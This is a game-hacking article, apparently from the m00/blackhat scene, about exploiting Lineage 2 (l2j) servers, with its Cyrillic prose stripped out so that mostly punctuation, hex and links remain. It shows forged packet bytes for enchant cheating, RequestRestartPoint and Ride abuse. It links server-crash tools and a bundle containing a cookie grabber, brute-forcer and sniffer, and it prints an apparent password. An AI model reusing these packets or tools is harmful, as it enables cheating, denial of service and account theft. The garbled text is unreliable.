 ,   ,      :
1-  -          ,    .

14 //   (UseItem)
86 a4 13 40 // OID 
00 00 00 00

      ,   :

58 //   (RequestEnchantItem)
74 a4 13 40 // OID 

  .
 ,     ,   ,   
        ,    .     artmoney
 100% .   ,      .
,       .     ?
      :
1.        
2.  RequestEnchantItem-  
3. drop'    (     ),     (fake)
.
4.      RequestEnchantItem-.  ,    .   ?
      antaras.ru,       , , ,    100%
     .    ,     ,   
      .

 -  ,    fake-.      ,   
,  -  .         ,  -
     .         ,    .
   ,    -       .
  ,    ,   .     
     .      "".
     cheaters.net.ua,     F4llen'a (    ):
+1 100% 
+2 100% 
+3 100%
+4 -+-+-+ (+-+-+-)   (----++++----+++) 
+5 ++---++-++----+++--- 
+6 +++++----+--++-- 
+7 +++++++++------ 
+8 +++-+-+++----+++ 
+9 ++-++--++---++-- 
+10 ++--+--++--+ 
"+"   , "-"  .
   ""   ,        " ":
)      +++++--+----+ 
) 2    ++--++-----++-++--- 
) - +-+-+-+ 4     . 
,        ,    / .
  ,       ,      ,   
    +15-.
     /   :
  /  . 
 +4         15/7         0.466
 +5         20/9         0.45
 +6         16/8         0.50
 +7         15/9         0.60
 +8         16/10        0.625
 +9         16/8         0.50 
 +10        12/6         0.50
     ,     F4llen'.    
 ,   0.52,  ,        .  
   ,         .
  ,      1  0.     240 ,
  60-  (    )      ( 
 "")          240  (    
     240):

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main () {
  int O = 0, I = 0, Ot = 0, It = 0, total = 241, r = 0;
  srand(time(0));
  for(int i = 0;i < total;i++) {
	r = rand()%2;
	printf("%i ",r);
	if(r) I++; else O++;
	if(!(i%60)) {
		printf("\n%i/%i\n : %.2f\n",I,O,I/0.60);
		Ot+=O; It+=I;
		I = 0; O = 0;
	}
    
  }
  printf("   : %.2f\n",It/2.40);
  return 0;
}

,     :
-----------------------
0 1 1 0 1 1 0 1 1 0 0 0 0 0 0 1 0 1 0 1 1 0 0 1 1 1 0 1 1 1 0 0 0 1 0 0 0 1 0 1
1 0 0 0 0 0 0 1 1 1 1 1 0 1 1 0 1 0 0 1
29/31
 : 48.33
0 0 0 1 1 0 0 0 0 1 0 1 1 1 0 0 0 1 1 0 1 0 1 0 1 0 0 1 1 1 1 0 1 1 0 1 0 0 0 1
0 1 0 0 1 1 0 1 1 0 1 0 1 1 0 1 1 1 1 1
32/28
 : 53.33
1 0 1 1 0 1 0 1 1 1 0 1 1 1 0 1 1 0 0 1 1 0 1 1 1 1 0 1 1 1 0 0 0 1 0 0 1 1 0 0
0 1 0 1 1 0 0 1 0 1 0 0 1 0 0 0 0 1 0 0
31/29
 : 51.67
1 0 0 1 1 1 1 0 0 0 0 0 0 0 1 1 0 0 1 1 1 0 1 0 0 1 0 0 0 1 0 0 0 1 0 1 0 1 1 0
1 0 1 0 0 0 1 0 1 1 0 0 1 0 0 1 0 1 1 1
27/33
 : 45.00
   : 50.00
-----------------------
 ,    " "    f4llen  ,   0  1  
   .        (  60- ),
     50%,         
  0  1.
 ,  f4llen'   ,     .

      ,  ,         :
 L2j     ,      ,    .  
 ,        ,   .
 ,  lineage2 off   .

 ,  ,      rand(),     =)     
 ,   ,    ,    ,   .


 , "  ,      " (c) -.



12.  (  ).
       ,  l2j     .      
        l2j  off.
     la2   . ,  ,      
 . ,     ,   ,       
     ,  ,     .      
       .        
" ", , ,       .
 l2j   ,     .   ?  ,    
       . ,   (    
 ),     ,    ,   (  )     .
     l2j.  1   3/C4    ,     
      .

    ,     "0x01 MoveBackwardToLocation".  
    -      .      
       . ,         ! 
,           ,   "0x48 ValidatePosition".
 ,  ,        ,     ,
 ,    .
  ,   ,   =)



13.   SocialAction (0x1b)
  SocialAction, ,   . ,   , ,   , 
 LVL UP'    SocialAction'. ,   ,    SocialAction
 ,           lvlup =)  , .
  SocialAction-:

1b //   (SocialAction)
0f 00 00 00 //  action' (0f - lvlup)



14.  c Ride (0x6a)
 "Ride"  ,       .
:

6a //  
00 00 00 00 // 0/1 /
00 00 00 00 //  : 1 - , 2 

         "Ride",   ,   (    
   OID -     ,      ,  ),     
   ,      :)   ,   .
,    2-    ,      ,  
   .     ,   ,  :
6a 01 00 00 00 01 00 00 00
   ,     . ,      .      
 .
 ,      SocialAction      Maddaemon.  .



15.    
    ,     .   ,      
  (  4-),      human'? ,  human   
  NPC human',          .  , ,    human'
   __ 1/C3 . 4            .
 ,      la2 C4    ,  .     
 ,     ,      "/target".
, ,         ,     , .. 
   ,         .

       4  ( l2j),  .
 , ,      )   ,  .     -
.

http://m00.void.ru/nuke.rar -       4 .   ,   
    .



16.   RequestRestartPoint (    )
        www.allcheats.ru   sshd.
  ,       ,     .      
: "return to the nearest village".       :

6d //   (RequestRestartPoint)
00 00 00 00 // ,      ,   

   ,           .  ,  ,  .
LA2 3/C4      ( ):

0  return to town ( )
1  hide PK (  ,         ,   )
2  to castle ( )
3  to siege HQ (    )
4  fixed, festival (       ).

 ,   "00 00 00 00", "04 00 00 00"      ,    .
    ,      ,      .
  ,   ,    .        ,  
,     -  .  antaras.ru,  ,   ,   
,   .     "RequestRestartPoint"    "03 00 00 00"  
 (  :))   .



17.       ,   -   ?
,    .       ,        lineage2,
     .  ,       :)
 ,        (     
  ,   ).          www.l2extreme.com,
  ,      .
   ,       "6IlZk9qR[!]"  .



18. 
,    - .  ,          
 . ,          ,    
  la2brute.5bb.ru.


V.   
[]
  ,         LA2Monster.


VI.    C4
 4      .       .
L2J C4        RSA (     NCSoft).
,  private/public-    .     
 1024-  ,   __ blowfish    /.
   ,          . , 
  Rc5-64,   128-      .
 ,   key-pair  RSA   .      
   openssl  ~1.5-2 ,     , ,  1000  -
 .   , login-   NCSoft       
game-, ,     ,        .
   1   4, RSA    .     
,      game-.     l2j   1-4
     4 .



VII. .
,      RFC  lineage, , ,  
 ,              .   ,  , 
     .
   -     (,   :D)    ,   d4rk@securitylab.ru,
    www.allcheats.ru   "nop".
  .


VIII. .

http://72.14.203.104/search?q=cache:Dt3J-o9GNJcJ:gamehaqs.com/forums/
index.php%3Fshowtopic%3D5041+blowfish+lineage2&hl=ru&gl=ru&ct=clnk&cd=1 -
    bbs',    -  lineage.
  ,       l2j      
  .
http://forum.ragezone.com/server-help-extra/lin1-server-emulator-incomplete-cant-even-login-26438.html -   
http://allcheats.ru/forums/showthread.php?t=1844 -   ,   .   
,  .
http://cheaters.net.ua/forum/index.php?s=083fef4f61997fc4be2ad3b0a98ba8a2&showtopic=254&pid=2254&st=0&#entry2254 -
 F4llen'  fake-     (        ).
http://www.javable.com/columns/crypto/algorythms/01/ -    blowfish.
http://arbuz.uz/z_pihns.html -          . ,  
.
http://www.securitylab.ru/analytics/216301.php -     . 
    -  HalfLife,     .
http://la2brute.5bb.ru -  .
http://m00.void.ru/nuke.rar -   -    13 (   )
http://la2brute.5bb.ru/viewtopic.php?id=52 - ,    LA2Fun      
    l2j.
http://la2brute.5bb.ru/viewtopic.php?id=53 - ,    (  )  
  LA2Fun.


IX.   .
     : m00.blackhat.ru/la2shit.rar
:
game-serv-encryption.txt -      game- ( sauron  allcheats.ru).
grabber.c -         www.antaras.ru. ,  antaras.ru  
 cookie,         .        .
ID.rar -      ID
la2brute_1.1.OLD.rar -    la2brute.    -  . , , 
   PoC' =)
la2reklamer.rar -     .    ,     
       .
raid.jpg -  ,      =)  Hint
screenshot1.jpg -   auth-
screenshot2.jpg -       sniffit     2 .
shot1.JPG, shot2.JPG, shot3.JPG -  ,    la2fun
sniff.exe -    .. ,     / la2-.
  login-  game-.     ,      
    =)
mass.nuke.avi -  ,  -       .
la2-example.c -   RequestAuthLogin-
Sniffit.LA2C3.plug.rar -   sniffit,     RequestAuthLogin- 
   /
l2.crash.ini -      L2C3     .   
      ,    l2.ini  .
la2fun_1.2.demo.rar -  LA2Fun 1.2.   ,  ,   ,    .
  LA2Fun  LA2Bute 1.5 (3/C4)        ,     ..
   linux- la2brute,  -    :\


  h0snp, sshd  hint =) 
   Silence/EF ;)   #m00  irc.blackhat.ru


(c) darkgrey / m00.blackhat.ru


